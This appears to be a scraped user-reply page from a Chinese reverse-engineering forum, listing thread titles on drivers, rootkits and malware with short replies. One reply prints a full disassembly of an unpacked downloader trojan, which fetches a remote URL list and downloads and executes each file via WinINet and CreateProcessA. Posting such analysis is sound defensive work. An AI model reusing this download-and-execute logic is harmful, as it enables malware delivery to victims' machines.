|
|
[求助]cpu在切换进程时会不会切换控制寄存器cr0~4?
关于控制寄存器的知识. 不知对你有帮助没 40fK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6h3y4J5j5i4A6&6j5$3!0V1k6i4u0Q4x3X3g2U0L8W2)9J5c8X3#2&6M7r3c8X3i4K6u0r3y4o6M7^5x3o6g2Q4x3X3g2H3k6r3j5`. |
|
|
[分享]全新原创Anti-rootkit软件SysReveal,欢迎试用
顶个......... |
|
|
[求助]windbg 局域网调试设置
好郁闷。谢谢你喽。。。 |
|
|
[求助] 恢复INT1 蓝屏
学习了。 谢谢qihoocom 指点。。。 |
|
|
|
|
|
[原创]virut分析
支持。强文 沙发 ? |
|
|
[下载]驱动程序设计基础专题(chm版)
下了.谢谢谢 |
|
|
[分享]我的驱动学习笔记
学习.谢谢楼主.... |
|
|
[讨论]发个高质量下载样本一个
脱个壳看没什么东西..都很直关.不多说了....谢谢作者给个学习的机会... 00401000 55 push ebp 00401001 8BEC mov ebp,esp 00401003 83C4 AC add esp,-54 00401006 8D45 BC lea eax,dword ptr ss:[ebp-44] 00401009 50 push eax 0040100A E8 17040000 call du_1.00401426 ; jmp to kernel32.GetStartupInfoA 0040100F 8D45 AC lea eax,dword ptr ss:[ebp-54] 00401012 50 push eax 00401013 8D45 BC lea eax,dword ptr ss:[ebp-44] 00401016 50 push eax 00401017 6A 00 push 0 00401019 6A 00 push 0 0040101B 6A 20 push 20 0040101D 6A 00 push 0 0040101F 6A 00 push 0 00401021 6A 00 push 0 00401023 FF75 08 push dword ptr ss:[ebp+8] 00401026 6A 00 push 0 00401028 E8 DB030000 call du_1.00401408 ; jmp to kernel32.CreateProcessA 0040102D 0BC0 or eax,eax 0040102F 75 10 jnz short du_1.00401041 00401031 FF75 B0 push dword ptr ss:[ebp-50] 00401034 E8 BD030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 00401039 FF75 AC push dword ptr ss:[ebp-54] 0040103C E8 B5030000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 00401041 C9 leave 00401042 C2 0400 retn 4 00401045 55 push ebp 00401046 8BEC mov ebp,esp 00401048 81C4 E8FDFFFF add esp,-218 0040104E 33C0 xor eax,eax 00401050 8945 E8 mov dword ptr ss:[ebp-18],eax 00401053 6A 00 push 0 00401055 6A 00 push 0 00401057 6A 00 push 0 00401059 6A 00 push 0 0040105B 68 06304000 push du_1.00403006 ; ASCII "Shell" 00401060 E8 21040000 call du_1.00401486 ; jmp to wininet.InternetOpenA 00401065 0BC0 or eax,eax 00401067 0F84 F1000000 je du_1.0040115E 0040106D 8945 FC mov dword ptr ss:[ebp-4],eax 00401070 6A 04 push 4 00401072 FF75 10 push dword ptr ss:[ebp+10] 00401075 6A 02 push 2 00401077 FF75 FC push dword ptr ss:[ebp-4] 0040107A E8 19040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA 0040107F 6A 04 push 4 00401081 FF75 10 push dword ptr ss:[ebp+10] 00401084 6A 06 push 6 00401086 FF75 FC push dword ptr ss:[ebp-4] 00401089 E8 0A040000 call du_1.00401498 ; jmp to wininet.InternetSetOptionA 0040108E 6A 00 push 0 00401090 68 00000020 push 20000000 00401095 6A 00 push 0 00401097 6A 00 push 0 00401099 FF75 08 push dword ptr ss:[ebp+8] 0040109C FF75 FC push dword ptr ss:[ebp-4] 0040109F E8 E8030000 call du_1.0040148C ; jmp to wininet.InternetOpenUrlA 004010A4 0BC0 or eax,eax 004010A6 0F84 AA000000 je du_1.00401156 004010AC 8945 F8 mov dword ptr ss:[ebp-8],eax 004010AF C745 EC 00000000 mov dword ptr ss:[ebp-14],0 004010B6 C745 F0 00020000 mov dword ptr ss:[ebp-10],200 004010BD FF75 EC push dword ptr ss:[ebp-14] 004010C0 8D45 F0 lea eax,dword ptr ss:[ebp-10] 004010C3 50 push eax 004010C4 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218] 004010CA 50 push eax 004010CB 6A 13 push 13 004010CD FF75 F8 push dword ptr ss:[ebp-8] 004010D0 E8 9F030000 call du_1.00401474 ; jmp to wininet.HttpQueryInfoA 004010D5 0BC0 or eax,eax 004010D7 74 75 je short du_1.0040114E 004010D9 6A 00 push 0 004010DB 6A 00 push 0 004010DD 6A 04 push 4 004010DF 6A 00 push 0 004010E1 6A 00 push 0 004010E3 68 00000040 push 40000000 004010E8 FF75 0C push dword ptr ss:[ebp+C] 004010EB E8 0C030000 call du_1.004013FC ; jmp to kernel32.CreateFileA 004010F0 83F8 FF cmp eax,-1 004010F3 74 59 je short du_1.0040114E 004010F5 8945 F4 mov dword ptr ss:[ebp-C],eax 004010F8 C745 EC 00000000 mov dword ptr ss:[ebp-14],0 004010FF 8D45 EC lea eax,dword ptr ss:[ebp-14] 00401102 50 push eax 00401103 68 00020000 push 200 00401108 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218] 0040110E 50 push eax 0040110F FF75 F8 push dword ptr ss:[ebp-8] 00401112 E8 7B030000 call du_1.00401492 ; jmp to wininet.InternetReadFile 00401117 0BC0 or eax,eax 00401119 74 23 je short du_1.0040113E 0040111B 837D EC 00 cmp dword ptr ss:[ebp-14],0 0040111F 74 1D je short du_1.0040113E 00401121 FF45 E8 inc dword ptr ss:[ebp-18] 00401124 6A 00 push 0 00401126 8D45 F0 lea eax,dword ptr ss:[ebp-10] 00401129 50 push eax 0040112A FF75 EC push dword ptr ss:[ebp-14] 0040112D 8D85 E8FDFFFF lea eax,dword ptr ss:[ebp-218] 00401133 50 push eax 00401134 FF75 F4 push dword ptr ss:[ebp-C] 00401137 E8 1A030000 call du_1.00401456 ; jmp to kernel32.WriteFile 0040113C ^ EB BA jmp short du_1.004010F8 0040113E FF75 F4 push dword ptr ss:[ebp-C] 00401141 E8 FE020000 call du_1.00401444 ; jmp to kernel32.SetEndOfFile 00401146 FF75 F4 push dword ptr ss:[ebp-C] 00401149 E8 A8020000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 0040114E FF75 F8 push dword ptr ss:[ebp-8] 00401151 E8 24030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle 00401156 FF75 FC push dword ptr ss:[ebp-4] 00401159 E8 1C030000 call du_1.0040147A ; jmp to wininet.InternetCloseHandle 0040115E 8B45 E8 mov eax,dword ptr ss:[ebp-18] 00401161 C9 leave 00401162 C2 0C00 retn 0C 00401165 55 push ebp 00401166 8BEC mov ebp,esp 00401168 81C4 FCFDFFFF add esp,-204 0040116E C745 FC 3C000000 mov dword ptr ss:[ebp-4],3C 00401175 FF75 08 push dword ptr ss:[ebp+8] 00401178 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204] 0040117E 50 push eax 0040117F E8 D8020000 call du_1.0040145C ; jmp to kernel32.lstrcpyA 00401184 68 00010000 push 100 00401189 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] 0040118F 50 push eax 00401190 E8 A9020000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory 00401195 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] 0040119B 50 push eax 0040119C 6A 00 push 0 0040119E 6A 00 push 0 004011A0 68 04304000 push du_1.00403004 004011A5 E8 82020000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA 004011AA 68 88130000 push 1388 004011AF 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] 004011B5 50 push eax 004011B6 8D85 FCFDFFFF lea eax,dword ptr ss:[ebp-204] 004011BC 50 push eax 004011BD E8 83FEFFFF call du_1.00401045 004011C2 0BC0 or eax,eax 004011C4 74 10 je short du_1.004011D6 004011C6 8D85 FCFEFFFF lea eax,dword ptr ss:[ebp-104] 004011CC 50 push eax 004011CD E8 2EFEFFFF call du_1.00401000 004011D2 EB 15 jmp short du_1.004011E9 004011D4 EB 0D jmp short du_1.004011E3 004011D6 68 E8030000 push 3E8 004011DB E8 6A020000 call du_1.0040144A ; jmp to kernel32.Sleep 004011E0 FF4D FC dec dword ptr ss:[ebp-4] 004011E3 837D FC 00 cmp dword ptr ss:[ebp-4],0 004011E7 ^ 75 C1 jnz short du_1.004011AA 004011E9 FF0D 00304000 dec dword ptr ds:[403000] 004011EF C9 leave 004011F0 C2 0400 retn 4 /////////////入口 004011F3 55 push ebp 004011F4 8BEC mov ebp,esp 004011F6 81C4 E8FEFFFF add esp,-118 004011FC 68 0C304000 push du_1.0040300C ; ASCII "user32.dll" 00401201 E8 2C020000 call du_1.00401432 ; jmp to kernel32.LoadLibraryA 00401206 0BC0 or eax,eax 00401208 74 11 je short du_1.0040121B 0040120A 68 17304000 push du_1.00403017 ; ASCII "LoadRemoteFonts" 0040120F 50 push eax 00401210 E8 0B020000 call du_1.00401420 ; jmp to kernel32.GetProcAddress 00401215 0BC0 or eax,eax 00401217 74 02 je short du_1.0040121B 00401219 FFD0 call eax 0040121B 8D45 FC lea eax,dword ptr ss:[ebp-4] 0040121E 50 push eax 0040121F 68 19000200 push 20019 00401224 6A 00 push 0 00401226 68 27304000 push du_1.00403027 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" 0040122B 68 02000080 push 80000002 00401230 E8 33020000 call du_1.00401468 ; jmp to ADVAPI32.RegOpenKeyExA 00401235 0BC0 or eax,eax 00401237 75 48 jnz short du_1.00401281 00401239 C745 F8 04010000 mov dword ptr ss:[ebp-8],104 00401240 68 04010000 push 104 00401245 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 0040124B 50 push eax 0040124C E8 ED010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory 00401251 8D45 F8 lea eax,dword ptr ss:[ebp-8] 00401254 50 push eax 00401255 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 0040125B 50 push eax 0040125C 6A 00 push 0 0040125E 6A 00 push 0 00401260 68 06304000 push du_1.00403006 ; ASCII "Shell" 00401265 FF75 FC push dword ptr ss:[ebp-4] 00401268 E8 01020000 call du_1.0040146E ; jmp to ADVAPI32.RegQueryValueExA 0040126D 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 00401273 50 push eax 00401274 E8 87FDFFFF call du_1.00401000 00401279 FF75 FC push dword ptr ss:[ebp-4] 0040127C E8 E1010000 call du_1.00401462 ; jmp to ADVAPI32.RegCloseKey 00401281 68 E8030000 push 3E8 00401286 E8 BF010000 call du_1.0040144A ; jmp to kernel32.Sleep 0040128B 6A 00 push 0 0040128D 8D45 F8 lea eax,dword ptr ss:[ebp-8] 00401290 50 push eax 00401291 E8 EA010000 call du_1.00401480 ; jmp to wininet.InternetGetConnectedState 00401296 0BC0 or eax,eax 00401298 75 02 jnz short du_1.0040129C 0040129A ^ EB EF jmp short du_1.0040128B 0040129C 68 04010000 push 104 004012A1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 004012A7 50 push eax 004012A8 E8 91010000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory 004012AD 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 004012B3 50 push eax 004012B4 6A 00 push 0 004012B6 6A 00 push 0 004012B8 68 04304000 push du_1.00403004 004012BD E8 6A010000 call du_1.0040142C ; jmp to kernel32.GetTempFileNameA 004012C2 68 E8030000 push 3E8 004012C7 E8 7E010000 call du_1.0040144A ; jmp to kernel32.Sleep 004012CC 68 88130000 push 1388 004012D1 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 004012D7 50 push eax 004012D8 68 5D304000 push du_1.0040305D ; ASCII "f6eK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8X3&6A6L8h3q4T1K9g2)9J5k6h3u0W2i4K6u0W2L8h3q4Q4x3V1k6T1i4K6u0r3j5g2)9J5c8X3#2Q4x3X3g2@1P5s2b7`." 004012DD E8 63FDFFFF call du_1.00401045 004012E2 0BC0 or eax,eax 004012E4 75 02 jnz short du_1.004012E8 004012E6 ^ EB E4 jmp short du_1.004012CC 004012E8 6A 00 push 0 004012EA 6A 00 push 0 004012EC 6A 03 push 3 004012EE 6A 00 push 0 004012F0 6A 00 push 0 004012F2 68 00000080 push 80000000 004012F7 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 004012FD 50 push eax 004012FE E8 F9000000 call du_1.004013FC ; jmp to kernel32.CreateFileA 00401303 83F8 FF cmp eax,-1 00401306 0F84 CC000000 je du_1.004013D8 0040130C 8945 F4 mov dword ptr ss:[ebp-C],eax 0040130F 6A 00 push 0 00401311 FF75 F4 push dword ptr ss:[ebp-C] 00401314 E8 01010000 call du_1.0040141A ; jmp to kernel32.GetFileSize 00401319 83F8 0F cmp eax,0F 0040131C 0F82 9F000000 jb du_1.004013C1 00401322 6A 00 push 0 00401324 6A 00 push 0 00401326 6A 00 push 0 00401328 6A 02 push 2 0040132A 6A 00 push 0 0040132C FF75 F4 push dword ptr ss:[ebp-C] 0040132F E8 CE000000 call du_1.00401402 ; jmp to kernel32.CreateFileMappingA 00401334 0BC0 or eax,eax 00401336 0F84 92000000 je du_1.004013CE 0040133C 8945 F0 mov dword ptr ss:[ebp-10],eax 0040133F 6A 00 push 0 00401341 6A 00 push 0 00401343 6A 00 push 0 00401345 6A 04 push 4 00401347 50 push eax 00401348 E8 EB000000 call du_1.00401438 ; jmp to kernel32.MapViewOfFile 0040134D 0BC0 or eax,eax 0040134F 74 66 je short du_1.004013B7 00401351 8945 EC mov dword ptr ss:[ebp-14],eax 00401354 8BF0 mov esi,eax 00401356 8DBD E8FEFFFF lea edi,dword ptr ss:[ebp-118] 0040135C 68 04010000 push 104 00401361 57 push edi 00401362 E8 D7000000 call du_1.0040143E ; jmp to ntdll.RtlZeroMemory 00401367 AC lods byte ptr ds:[esi] 00401368 3C 0A cmp al,0A 0040136A 75 01 jnz short du_1.0040136D 0040136C AC lods byte ptr ds:[esi] 0040136D 3C 0D cmp al,0D 0040136F 75 39 jnz short du_1.004013AA 00401371 80BD E8FEFFFF 00 cmp byte ptr ss:[ebp-118],0 00401378 74 2E je short du_1.004013A8 0040137A FF05 00304000 inc dword ptr ds:[403000] 00401380 8D45 F8 lea eax,dword ptr ss:[ebp-8] 00401383 50 push eax 00401384 6A 00 push 0 00401386 8D85 E8FEFFFF lea eax,dword ptr ss:[ebp-118] 0040138C 50 push eax 0040138D 68 65114000 push du_1.00401165 00401392 6A 00 push 0 00401394 6A 00 push 0 00401396 E8 73000000 call du_1.0040140E ; jmp to kernel32.CreateThread 0040139B 50 push eax 0040139C E8 55000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 004013A1 6A 64 push 64 004013A3 E8 A2000000 call du_1.0040144A ; jmp to kernel32.Sleep 004013A8 ^ EB AC jmp short du_1.00401356 004013AA AA stos byte ptr es:[edi] 004013AB 0AC0 or al,al 004013AD ^ 75 B8 jnz short du_1.00401367 004013AF FF75 EC push dword ptr ss:[ebp-14] 004013B2 E8 99000000 call du_1.00401450 ; jmp to kernel32.UnmapViewOfFile 004013B7 FF75 F0 push dword ptr ss:[ebp-10] 004013BA E8 37000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 004013BF EB 0D jmp short du_1.004013CE 004013C1 FF75 F4 push dword ptr ss:[ebp-C] 004013C4 E8 2D000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 004013C9 ^ E9 FEFEFFFF jmp du_1.004012CC 004013CE FF75 F4 push dword ptr ss:[ebp-C] 004013D1 E8 20000000 call du_1.004013F6 ; jmp to kernel32.CloseHandle 004013D6 EB 05 jmp short du_1.004013DD 004013D8 ^ E9 EFFEFFFF jmp du_1.004012CC 004013DD EB 07 jmp short du_1.004013E6 004013DF 6A 64 push 64 004013E1 E8 64000000 call du_1.0040144A ; jmp to kernel32.Sleep 004013E6 833D 00304000 00 cmp dword ptr ds:[403000],0 004013ED ^ 75 F0 jnz short du_1.004013DF 004013EF 6A 00 push 0 004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess 004013F1 E8 1E000000 call du_1.00401414 ; jmp to kernel32.ExitProcess 004013F6 - FF25 54204000 jmp dword ptr ds:[402054] ; kernel32.CloseHandle 004013FC - FF25 4C204000 jmp dword ptr ds:[40204C] ; kernel32.CreateFileA 00401402 - FF25 48204000 jmp dword ptr ds:[402048] ; kernel32.CreateFileMappingA 00401408 - FF25 2C204000 jmp dword ptr ds:[40202C] ; kernel32.CreateProcessA 0040140E - FF25 10204000 jmp dword ptr ds:[402010] ; kernel32.CreateThread 00401414 - FF25 14204000 jmp dword ptr ds:[402014] ; kernel32.ExitProcess 0040141A - FF25 18204000 jmp dword ptr ds:[402018] ; kernel32.GetFileSize 00401420 - FF25 1C204000 jmp dword ptr ds:[40201C] ; kernel32.GetProcAddress 00401426 - FF25 20204000 jmp dword ptr ds:[402020] ; kernel32.GetStartupInfoA 0040142C - FF25 24204000 jmp dword ptr ds:[402024] ; kernel32.GetTempFileNameA 00401432 - FF25 28204000 jmp dword ptr ds:[402028] ; kernel32.LoadLibraryA 00401438 - FF25 50204000 jmp dword ptr ds:[402050] ; kernel32.MapViewOfFile 0040143E - FF25 30204000 jmp dword ptr ds:[402030] ; ntdll.RtlZeroMemory 00401444 - FF25 34204000 jmp dword ptr ds:[402034] ; kernel32.SetEndOfFile 0040144A - FF25 38204000 jmp dword ptr ds:[402038] ; kernel32.Sleep 00401450 - FF25 3C204000 jmp dword ptr ds:[40203C] ; kernel32.UnmapViewOfFile 00401456 - FF25 40204000 jmp dword ptr ds:[402040] ; kernel32.WriteFile 0040145C - FF25 44204000 jmp dword ptr ds:[402044] ; kernel32.lstrcpyA 00401462 - FF25 04204000 jmp dword ptr ds:[402004] ; ADVAPI32.RegCloseKey 00401468 - FF25 00204000 jmp dword ptr ds:[402000] ; ADVAPI32.RegOpenKeyExA 0040146E - FF25 08204000 jmp dword ptr ds:[402008] ; ADVAPI32.RegQueryValueExA 00401474 - FF25 74204000 jmp dword ptr ds:[402074] ; wininet.HttpQueryInfoA 0040147A - FF25 5C204000 jmp dword ptr ds:[40205C] ; wininet.InternetCloseHandle 00401480 - FF25 60204000 jmp dword ptr ds:[402060] ; wininet.InternetGetConnectedState 00401486 - FF25 64204000 jmp dword ptr ds:[402064] ; wininet.InternetOpenA 0040148C - FF25 68204000 jmp dword ptr ds:[402068] ; wininet.InternetOpenUrlA 00401492 - FF25 6C204000 jmp dword ptr ds:[40206C] ; wininet.InternetReadFile 00401498 - FF25 70204000 jmp dword ptr ds:[402070] ; wininet.InternetSetOptionA |
|
|
[原创]内存读取游戏木马分析
传说中的 沙发? |
|
|
|
|
|
[原创]密码学入门系列(四) 之 维吉尼亚密码(古典)
简单 意懂 支持啊。 |
|
|
|
|
|
[分享]做了两个语音视频, 壳的全程分析, 高手飘过吧
支持。。。。 |
|
|
[讨论]论坛是否有必要开设『手机安全』版块
一定有必要。。。支持看雪。。 |
|
|
|
|
|
[求助]懂驱动程序的请进
牛~~~~! |
|
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
勋章
兑换勋章
证书
证书查询 >
能力值
